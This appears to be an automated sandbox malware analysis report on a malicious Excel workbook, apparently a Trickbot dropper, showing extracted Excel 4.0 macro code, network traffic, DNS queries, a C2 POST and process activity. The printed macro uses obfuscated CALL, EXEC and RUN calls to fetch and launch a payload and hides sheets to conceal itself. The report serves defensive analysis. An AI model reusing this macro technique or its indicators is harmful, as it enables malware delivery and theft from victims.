                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . , . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                                              Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 275201
                                              General
                                              Stream Path:Book
                                              File Type:Applesoft BASIC program data, first line number 8
                                              Stream Size:275201
                                              Entropy:3.22962636978
                                              Base64 Encoded:True
                                              Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . S h e e t 4 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X
                                              Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                              Macro 4.0 Code

                                              "=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=IF(5+5,""dfdsfdsfds4fds85f48e18es1f8esf65d1f"",""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")=CALL(""UR""&Sheet5!BC27&Sheet5!BB31&Sheet5!BB32&Sheet5!BC34,Sheet5!BG17&Sheet5!BG18&Sheet5!BG35&Sheet5!BF33&Sheet5!BG37&Sheet5!BF37&Sheet5!BG39&Sheet5!BD37&Sheet5!BG41&Sheet5!CG42&Sheet5!BY62,Sheet5!BH16&Sheet5!BM32,Sheet5!BH43,Sheet5!BL17,Sheet5!BL21,Sheet5!BI50,Sheet5!BJ41)=RUN(Sheet3!BD26)",,"&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""=????(5+5;""dfdsfdsfds4fds85f48e18es1f8esf65d1f"";""sd4f81ds5f1e51f5ds1fe1fs351fe5s1f51h5y1j5y1h2t1gfg"")"
                                              =ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=EXEC(Sheet5!BE49&Sheet5!BB54&Sheet5!BL21&Sheet5!BF54&Sheet5!BF55&Sheet5!BF56)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ACOS(45654645646546)=ASIN(45654686846846)=ASIN(456346564848556)=ASIN(45654686846846)=RUN(Sheet2!BL23)
                                              "=WORKBOOK.HIDE(""Sheet2"",1)=WORKBOOK.HIDE(""Sheet3"",1)=WORKBOOK.HIDE(""Sheet4"",1)=WORKBOOK.HIDE(""Sheet5"",1)"=HALT()

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              05/04/21-06:49:30.982283TCP2404318ET CNC Feodo Tracker Reported CnC Server TCP group 1049170447192.168.2.22188.18.7.133

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 4, 2021 06:49:07.648139000 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:07.844942093 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:07.845417976 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:07.854957104 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:08.051678896 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:08.057069063 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:08.057109118 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:08.057132006 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:08.057151079 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:08.057235956 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:08.057271957 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:08.067159891 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:08.067377090 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:08.079866886 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:08.318128109 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:08.319694996 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:08.320734024 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.287029028 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.483766079 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.487762928 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.487809896 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.487835884 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.487863064 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.487893105 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.487919092 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.487941980 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.487942934 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.487963915 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.487970114 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.487986088 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.487992048 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.487993956 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.488019943 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.488050938 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.488054991 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.488075018 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.491446972 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.685950994 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.685977936 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.686239958 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.692692041 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.692728043 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.692755938 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.692780972 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.692805052 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.692828894 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.692837000 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.692845106 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.692868948 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.692889929 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.692892075 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.692893982 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.692910910 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.692959070 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.692986965 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.693000078 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.693005085 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.693022966 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.696588039 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.887702942 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.887736082 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.887932062 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.889534950 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.889560938 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.889579058 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.889594078 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.889611006 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.889630079 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.889647961 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.889663935 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.889672995 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.889681101 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.889694929 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.889705896 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.889713049 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.889734983 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.889738083 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.890017033 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.890036106 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.890187979 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.891947985 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.899007082 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.899030924 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.899044991 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.899058104 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.899070024 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.899133921 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.899159908 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.900269032 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.900289059 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:09.900331974 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:09.900353909 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:10.086019993 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:10.086050034 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:10.086272955 CEST49165443192.168.2.22144.208.70.30
                                              May 4, 2021 06:49:10.087089062 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:10.087114096 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:10.087136984 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:10.087160110 CEST44349165144.208.70.30192.168.2.22
                                              May 4, 2021 06:49:10.087181091 CEST44349165144.208.70.30192.168.2.22

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              May 4, 2021 06:49:07.563154936 CEST5219753192.168.2.228.8.8.8
                                              May 4, 2021 06:49:07.620317936 CEST53521978.8.8.8192.168.2.22
                                              May 4, 2021 06:49:08.735572100 CEST5309953192.168.2.228.8.8.8
                                              May 4, 2021 06:49:08.794120073 CEST53530998.8.8.8192.168.2.22
                                              May 4, 2021 06:49:08.799576998 CEST5283853192.168.2.228.8.8.8
                                              May 4, 2021 06:49:08.859306097 CEST53528388.8.8.8192.168.2.22
                                              May 4, 2021 06:49:22.536268950 CEST6120053192.168.2.228.8.8.8
                                              May 4, 2021 06:49:22.589442968 CEST53612008.8.8.8192.168.2.22
                                              May 4, 2021 06:49:22.604661942 CEST4954853192.168.2.228.8.8.8
                                              May 4, 2021 06:49:22.659740925 CEST53495488.8.8.8192.168.2.22
                                              May 4, 2021 06:49:26.241878033 CEST5562753192.168.2.228.8.8.8
                                              May 4, 2021 06:49:26.306328058 CEST53556278.8.8.8192.168.2.22
                                              May 4, 2021 06:49:26.308674097 CEST5600953192.168.2.228.8.8.8
                                              May 4, 2021 06:49:26.378845930 CEST53560098.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              May 4, 2021 06:49:07.563154936 CEST192.168.2.228.8.8.80xd92dStandard query (0)deluciaspizza.comA (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.536268950 CEST192.168.2.228.8.8.80x916aStandard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.604661942 CEST192.168.2.228.8.8.80x6005Standard query (0)api.ipify.orgA (IP address)IN (0x0001)
                                              May 4, 2021 06:49:26.241878033 CEST192.168.2.228.8.8.80x7adaStandard query (0)3.52.17.84.zen.spamhaus.orgA (IP address)IN (0x0001)
                                              May 4, 2021 06:49:26.308674097 CEST192.168.2.228.8.8.80xd517Standard query (0)3.52.17.84.cbl.abuseat.orgA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              May 4, 2021 06:49:07.620317936 CEST8.8.8.8192.168.2.220xd92dNo error (0)deluciaspizza.com144.208.70.30A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.589442968 CEST8.8.8.8192.168.2.220x916aNo error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                              May 4, 2021 06:49:22.589442968 CEST8.8.8.8192.168.2.220x916aNo error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                              May 4, 2021 06:49:22.589442968 CEST8.8.8.8192.168.2.220x916aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.243.154.178A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.589442968 CEST8.8.8.8192.168.2.220x916aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.252.36A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.589442968 CEST8.8.8.8192.168.2.220x916aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.216.111A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.589442968 CEST8.8.8.8192.168.2.220x916aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com107.22.233.72A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.589442968 CEST8.8.8.8192.168.2.220x916aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.252.4A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.589442968 CEST8.8.8.8192.168.2.220x916aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.83.248A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.589442968 CEST8.8.8.8192.168.2.220x916aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.242.215A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.589442968 CEST8.8.8.8192.168.2.220x916aNo error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.157.230A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.659740925 CEST8.8.8.8192.168.2.220x6005No error (0)api.ipify.orgnagano-19599.herokussl.comCNAME (Canonical name)IN (0x0001)
                                              May 4, 2021 06:49:22.659740925 CEST8.8.8.8192.168.2.220x6005No error (0)nagano-19599.herokussl.comelb097307-934924932.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                              May 4, 2021 06:49:22.659740925 CEST8.8.8.8192.168.2.220x6005No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.19.216.111A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.659740925 CEST8.8.8.8192.168.2.220x6005No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.157.230A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.659740925 CEST8.8.8.8192.168.2.220x6005No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com50.16.249.42A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.659740925 CEST8.8.8.8192.168.2.220x6005No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com23.21.48.44A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.659740925 CEST8.8.8.8192.168.2.220x6005No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.235.83.248A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.659740925 CEST8.8.8.8192.168.2.220x6005No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.169.203A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.659740925 CEST8.8.8.8192.168.2.220x6005No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com54.225.144.221A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:22.659740925 CEST8.8.8.8192.168.2.220x6005No error (0)elb097307-934924932.us-east-1.elb.amazonaws.com107.22.233.72A (IP address)IN (0x0001)
                                              May 4, 2021 06:49:26.306328058 CEST8.8.8.8192.168.2.220x7adaName error (3)3.52.17.84.zen.spamhaus.orgnonenoneA (IP address)IN (0x0001)
                                              May 4, 2021 06:49:26.378845930 CEST8.8.8.8192.168.2.220xd517No error (0)3.52.17.84.cbl.abuseat.org127.0.0.2A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • api.ipify.org
                                              • 103.102.220.50:443

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.224916854.243.154.17880C:\Windows\System32\wermgr.exe
                                              TimestampkBytes transferredDirectionData
                                              May 4, 2021 06:49:22.798752069 CEST541OUTGET /?format=text HTTP/1.1
                                              Connection: Keep-Alive
                                              User-Agent: curl/7.74.0
                                              Host: api.ipify.org
                                              May 4, 2021 06:49:22.939460993 CEST541INHTTP/1.1 200 OK
                                              Server: Cowboy
                                              Connection: keep-alive
                                              Content-Type: text/plain
                                              Vary: Origin
                                              Date: Tue, 04 May 2021 04:49:22 GMT
                                              Content-Length: 10
                                              Via: 1.1 vegur
                                              Data Raw: 38 34 2e 31 37 2e 35 32 2e 33
                                              Data Ascii: 84.17.52.3


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.2249172103.102.220.50443C:\Windows\System32\cmd.exe
                                              TimestampkBytes transferredDirectionData
                                              May 4, 2021 06:49:46.569828033 CEST1773OUTPOST /net9/035347_W617601.17B7997589EBB97D55BFB73DD1C2B3BB/83/ HTTP/1.1
                                              Accept: */*
                                              Content-Type: multipart/form-data; boundary=---------GRLZGARVGZREFNBN
                                              Connection: Close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 103.102.220.50:443
                                              Content-Length: 282
                                              Cache-Control: no-cache
                                              May 4, 2021 06:49:46.911587954 CEST1829INHTTP/1.1 200 OK
                                              connection: close
                                              server: Cowboy
                                              date: Tue, 04 May 2021 04:49:46 GMT
                                              content-length: 3
                                              Content-Type: text/plain
                                              Data Raw: 2f 31 2f
                                              Data Ascii: /1/


                                              HTTPS Packets

                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                              May 4, 2021 06:49:08.067159891 CEST144.208.70.30443192.168.2.2249165CN=deluciaspizza.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu May 14 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun May 15 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                              CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                              CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                              May 4, 2021 06:49:20.602458000 CEST117.54.250.246443192.168.2.2249167O=Internet Widgits Pty Ltd, ST=Some-State, C=AUO=Internet Widgits Pty Ltd, ST=Some-State, C=AUMon Apr 19 22:44:16 CEST 2021Tue Apr 19 22:44:16 CEST 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                              May 4, 2021 06:49:29.420820951 CEST117.54.250.246443192.168.2.2249169O=Internet Widgits Pty Ltd, ST=Some-State, C=AUO=Internet Widgits Pty Ltd, ST=Some-State, C=AUMon Apr 19 22:44:16 CEST 2021Tue Apr 19 22:44:16 CEST 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                              May 4, 2021 06:49:43.991502047 CEST117.54.250.246443192.168.2.2249171O=Internet Widgits Pty Ltd, ST=Some-State, C=AUO=Internet Widgits Pty Ltd, ST=Some-State, C=AUMon Apr 19 22:44:16 CEST 2021Tue Apr 19 22:44:16 CEST 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                              May 4, 2021 06:51:20.739713907 CEST117.54.250.246443192.168.2.2249173O=Internet Widgits Pty Ltd, ST=Some-State, C=AUO=Internet Widgits Pty Ltd, ST=Some-State, C=AUMon Apr 19 22:44:16 CEST 2021Tue Apr 19 22:44:16 CEST 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f
                                              May 4, 2021 06:51:20.797168970 CEST117.54.250.246443192.168.2.2249174O=Internet Widgits Pty Ltd, ST=Some-State, C=AUO=Internet Widgits Pty Ltd, ST=Some-State, C=AUMon Apr 19 22:44:16 CEST 2021Tue Apr 19 22:44:16 CEST 2022769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,10-11-23-65281,23-24,08c4a22651d328568ec66382a84fc505f

                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:06:48:39
                                              Start date:04/05/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                              Imagebase:0x13fc50000
                                              File size:27641504 bytes
                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:06:48:47
                                              Start date:04/05/2021
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:rundll32 ..\fndskfnds.dfm,StartW
                                              Imagebase:0xff630000
                                              File size:45568 bytes
                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:06:48:47
                                              Start date:04/05/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:rundll32 ..\fndskfnds.dfm,StartW
                                              Imagebase:0xe90000
                                              File size:44544 bytes
                                              MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2105353530.0000000002460000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2104607915.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000004.00000002.2104542682.00000000001D0000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:high

                                              General

                                              Start time:06:48:48
                                              Start date:04/05/2021
                                              Path:C:\Windows\System32\wermgr.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\wermgr.exe
                                              Imagebase:0xfff50000
                                              File size:50688 bytes
                                              MD5 hash:41DF7355A5A907E2C1D7804EC028965D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:06:49:06
                                              Start date:04/05/2021
                                              Path:C:\Windows\System32\taskeng.exe
                                              Wow64 process (32bit):false
                                              Commandline:taskeng.exe {A9986821-F5E8-4178-8C7A-712EEA14850B} S-1-5-18:NT AUTHORITY\System:Service:
                                              Imagebase:0xff870000
                                              File size:464384 bytes
                                              MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:06:49:07
                                              Start date:04/05/2021
                                              Path:C:\Windows\System32\rundll32.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\rundll32.EXE 'C:\Users\user\AppData\Roaming\iDownloadManager1882563550\kufndskfndszi.dwn',StartW
                                              Imagebase:0xff1d0000
                                              File size:45568 bytes
                                              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

